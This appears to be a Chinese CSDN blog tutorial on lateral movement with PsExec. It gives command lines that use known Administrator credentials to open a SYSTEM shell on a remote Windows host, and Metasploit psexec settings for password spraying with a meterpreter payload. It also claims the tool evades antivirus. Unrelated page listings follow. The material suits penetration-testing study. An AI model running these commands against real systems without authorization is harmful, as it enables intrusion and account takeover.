横向渗透之PsExec工具使用

已于 2022-05-25 21:48:17 修改
阅读量3.5k 收藏 12
点赞数 2
分类专栏: 内网安全 文章标签: 安全 网络安全 web安全 渗透测试
于 2022-04-16 16:59:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46258964/article/details/124216187
版权

psexec(微软官方工具)可以躲避检测无视杀毒软件,直接system权限
PsExec是一个轻量级的telnet替代品,它允许您在其他系统上执行进程,
并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。

PsExec的基本原理是:
通过管道在远程目标机器上创建一个psexec服务,
并在本地磁盘中生成一个名为PSEXESVC的二进制文件,
然后通过psexec服务运行命令,运行结束后删除任务。

利用条件

445端口开放,
知道目标账号密码

PsExec下载地址
优点:可以躲避检测无视杀毒软件,直接system权限

https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

基本使用命令

``
PsExec.exe /s cmd # 本地提权,还有一个提权作用,直接system权限

PsExec.exe \127.0.0.1 -u Administrator -p 123qwe@@ /s cmd # 本地提权

PsExec.exe \172.16.1.132 -u Administrator -p 123qwe@@ /s cmd # 横向入侵Windows主机,直接system权限
``

直接返回一个system权限的shell

在这里插入图片描述

Metasploit中的psexec模块
密码喷洒指的是用一个密码对多个账号对目标进行枚举爆破,躲避密码输入错误过多导致封锁账号

利用metasploit进行密码喷洒
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set smbuser user.txt
msf6 exploit(windows/smb/psexec) > set smbpass password.txt
msf6 exploit(windows/smb/psexec) > set rhost 172.16.1.132
msf6 exploit(windows/smb/psexec) > run

成功后直接返回一个system权限的主机上线msf

很多框架的集成了psexec工具,比如CS内网大杀器也结成了这个工具。总之就是牛逼6666

西湖第一剑
关注
  • 2
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
psexec
qq_44881113的博客
09-14 3890
psexec 是 windows 下非常好的一款远程命令行工具psexec使用不需要对方主机开方3389端口,只需要对方开启admin$共享 (该共享默认开启)。但是,假如目标主机开启了防火墙,psexec也是不能使用的,会提示找不到网络路径。由于psexec是Windows提供的工具,所以杀毒软件将其列在白名单中。但是PsExec在内网中大杀四方后,很多安全厂商开始将PsExec加入了黑名单 下载地址:https://docs.microsoft.com/zh-cn/sysinternals/dow.
横向移动检测之远程执行(一)PsExec
qq_27828281的博客
09-18 4322
横向移动——PsExec远程执行分析及溯源
使用System权限运行应用程序工具PsExec
01-03
解压后大小128KB的程序; 首先拷贝至System32下,然后以管理员权限运行CMD; 例如,你想运行的程序是:regedit.exe 在命令行中输入:psexec -i -d -s regedit.exe 然后在弹出的交互式服务对话框检测中点击显示消息就OK。 本人用此来解决在VISTA下由于使用UE而导致的花屏或者蓝屏0x00000018问题,详细解决方案参考本人xchuu的163里面的blog, 地址:http://xchuu.blog.163.com/blog/static/2020791120100310495384/
内网渗透——PSExec工具
tomyyyyy
04-16 842
内网渗透——PSExec工具 目录内网渗透——PSExec工具简介工作原理作为渗透工具的缺点使用流程定位域控无IPC连接有IPC连接Msf中的Psexec模块使用技巧remote UAC参考简介 PsExec 是由 Mark Russinovich 创建的 Sysinternals Suite中包含的工具。最初,它旨在作为系统管理员的便利工具,以便他们可以通过在远程主机上运行命令来执行维护任务。...
运行system权限工具
06-22
运行system权限工具psexec 用法:psexec [\\computer[,computer2[,...] | @file][-u user [-p psswd]][-n s][-l][-s|-e][-x][-i [session]][-c [-f|-v]][-w directory][-d][-<priority>][-a n,n,...] cmd [arguments] computer 指示 PsExec 在指定的一台或多台计算机上运行应用程序。如果省略计算机名称,则 PsExec 将在本地系统上运行应用程序;如果输入计算机名称“\\*”,则 PsExec 将在当前域中的所有计算机上运行应用程序。 @file 指示 PsExec 在指定的文本文件中列出的每台计算机上运行命令。 -a 用逗号分隔可以运行应用程序的处理器,CPU 编号最小为 1。例如,要在 CPU 2 和 CPU 4 上运行应用程序,请输入:“-a 2,4” -c 将指定的程序复制到远程系统以便执行。如果省略此选项,则应用程序必须位于远程系统上的系统路径中。 -d 不等待应用程序终止。请只对非交互式应用程序使用此选项。 -e 不加载指定帐户的配置文件。 -f 将指定的程序复制到远程系统,即使远程系统中已存在该文件。 -i 运行程序,以便它与远程系统中指定会话的桌面进行交互。如果未指定会话,则进程将在控制台会话中运行。 -l 以受限用户身份(去除 Administrators 组的权限,并且只允许使用分配给 Users 组的权限)运行进程。在 Windows Vista 上,此进程将以“低完整性”运行。 -n 指定与远程计算机连接的超时(秒)。 -p 指定用户名的密码(可选)。如果省略此选项,系统将提示您输入隐藏密码。 -s 在系统帐户中运行远程进程。 -u 指定用于登录远程计算机的可选用户名。 -v 仅在指定文件具有更高版本号或该文件比远程系统上的文件新时复制该文件。 -w 设置进程的工作目录(相对于远程计算机)。 -x 在 Winlogon 桌面上显示 UI(仅限于本地系统)。 -priority 指定 –low、-belownormal、-abovenormal、-high 或 -realtime 按不同优先级运行进程。 program 要执行的程序的名称。 arguments 要传递的参数(请注意,文件路径必须是目标系统中的绝对路径) 对于其名称中含有空格的应用程序,可以在其两侧加引号,例如,psexec \\marklap "c:\long name\app.exe"。按下 Enter 键时,仅将输入内容传递到远程系统。键入 Ctrl-C 可终止远程进程。 如果省略用户名,则远程进程将以执行 PsExec 时所使用的相同帐户运行,但由于远程进程以模仿方式运行,因此它无权访问远程系统上的网络资源。指定用户名时,远程进程将以指定的帐户执行,并可访问该帐户有权访问的任何网络资源。请注意,密码是以明文形式传递到远程系统的。 当目标系统是本地系统时,由于 PsExec 不需要您具有管理员权限,因此您可以使用当前版本的 PsExec 来取代 Runas。 以下命令可在 \\marklap 上启动交互式命令提示窗口: psexec \\marklap cmd 此命令通过 /all 开关在远程系统上执行 IpConfig,并在本地显示输出结果: psexec \\marklap ipconfig /all 此命令将程序 test.exe 复制到远程系统,并以交互方式执行此程序: psexec \\marklap -c test.exe 如果远程系统中已经安装的程序不在系统路径中,请指定该程序的完整路径: psexec \\marklap c:\bin\test.exe 在系统帐户中以交互方式运行 Regedit,以便查看 SAM 和 SECURITY 注册表项的内容: psexec -i -d -s c:\windows\regedit.exe 要以受限用户权限运行 Internet Explorer,请使用此命令: psexec -l -d "c:\program files\internet explorer\iexplore.exe"
Windows远程执行进程工具psexec和wmiexec介绍
测试开发小记
05-08 3066
在自动化测试或者自动化工具开发中,通常需要向其它电脑或者服务器发送指令,比如Windows发送命令到Linux服务器开启某个服务进程,或者读取状态信息,我们可以使用ssh协议实现。如果Windows主机需要发送命令到局域网内的其它Windows电脑要如何实现呢?在网络安全中称为横向移动的内网渗透方法可实现远程执行命令,横向移动工具有很多,本文介绍psexec和wmiexec这两个工具如何实现远程执行进程。
psexec实现控制多台电脑的cmd
lilien的博客
06-23 865
psexec实现控制多台电脑的cmd
横向渗透PSExec、SMBExec和WMIExec使用及特征
weixin_65550121的博客
12-09 1350
支持单向、双向通信。攻击者通过PSEXEC连接到远程机器并通过命名管道执行命令,命名管道是通过一个随机命名的二进制文件创建的,这个文件被写入到远程机器上的ADMIN$共享,最后通过SVCManager用来创建服务。建立连接之后,我们执行notepad.exe,可以发现它卡在这了,这因为我们在等待远程机器的输入,然而它永远不会输入。首先我们通过PSEXEC横向的时候,这里上传了一个文件名字叫SBxFixsS.exe的文件,也就是说将这个文件写入到了远程机器的ADMIN$共享中,我们可以查看一下共享目录。
Psexec使用方式
bring_coco的博客
07-18 4167
Psexec使用方式
Sysinternals工具使用手册 20240208
04-05
Sysinternals工具使用手册,包括工具索引,使用说明、下载等。 包含工具:AccessChk、AccessEnum、AdExplorer、AdInsight、AdRestore、Autologon、Autoruns、BgInfo、BlueScreen、CacheSet、ClockRes、Contig、...
PsExec工具
02-16
Windows Sysinternals工具集里的 “PSExec工具,可以远程执行等(包含64位的PSExec
psexec工具
11-01
psexec 下载工具,可远程连接控制主机下载文件,像telnet一样
渗透工具
01-15
windows平台下的mimikatz,psexec,ms14-068 三种用来进行域渗透工具
vue2 顶象 安全 验证码的使用
lele66688888的博客
04-23 319
类似与这样的登录之前的验证 滑动一个盒子了 或者是 顺序点击文字了 等。
RTU遥测终端为城市排水安全保驾护航!
mantoo2014的博客
04-23 473
漫途多参数遥测终端MTW46-10-4A与低功耗遥测终端M4315,能够实时在线监测城市下水管道、涵洞、水浸点及河道的水位状况,同时精准采集水位、流量、流速和水质等数据。一旦监测到险情,平台会通过手机APP、短信通知以及现场声光报警器等多种方式,向城市管理者发出预警,从而有效预防和应对各类排水问题,确保城市排水系统的安全、稳定运行。漫途低功耗远程采集终端M4315是一款实现数据采集、远程传输、远程运维的智能设备,具有功耗低、体积小巧、盲区小、安装便捷等特点,适用于地下管网、雨水井等特殊环境的工业级设备。
Mudem,打造私密安全、高效稳定的私人空间
yescodigger的博客
04-23 351
平台中的一个关键组件,它提供基础通讯服务,确保不同类型的机器之间可以进行安全和高效的连接。用户无需担心环境配置的问题,只需在任何地点、任何时间使用自己熟悉的工作环境,即可实现高效工作,极大地提高了工作效率。用户可以根据自己的需求精确控制终端的访问权限,从而有效地防止了未经授权的访问和数据泄露。这一技术革新不仅使用户能够轻松实现远程访问和控制这些设备,同时确保了终端访问权限的精确控制,从而保障了用户数据的安全。在远程访问过程中确保了数据的机密性和完整性,让用户无需担心数据泄露的风险。精准控制终端访问权限。
多家企业机密数据遭Lockbit3.0窃取,亚信安全发布《勒索家族和勒索事件监控报告》
亚信安全官方账号的博客
04-26 904
亚信安全发布2024年第14期《勒索家族和勒索事件监控报告》,本周全球共监测到勒索事件87起,与上周相比勒索事件大幅下降。
医院手术室麻醉信息管理系统源码 自动生成麻醉的各种医疗文书(手术风险评估表、手术安全核查表)
最新发布
源码技术栈的博客
04-26 1174
手术麻醉信息管理系统包含了患者从预约申请手术到术前、术中、术后的流程控制。手术麻醉信息管理系统主要是由监护设备数据采集子系统和麻醉临床系统两个子部分组成。包括从手术申请到手术分配,再到术前访视、术中记录及术后恢复的全过程中都可以得到全方位的保障。
安全计算环境中,入侵防范的测评指标对应的测评对象包含哪些?
2301_79527080的博客
04-24 461
安全计算环境中,入侵防范的测评指标包括恶意代码防范、可信验证、数据完整性、数据保密性、数据备份恢复、剩余信息保护、个人信息保护等。入侵防范的测评对象则包含网络设备、安全设备、服务器设备、终端设备、应用系统、数据对象和其他设备等。恶意代码防范:确保系统能够检测和防御恶意软件,如病毒和木马,从而保护计算环境的完整性和保密性。终端设备:用户直接操作的设备,如电脑和手机,它们的安全性直接影响到用户数据的安全。数据对象:存储在系统中的各种数据,包括数据库、文件等,它们是信息安全的核心。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值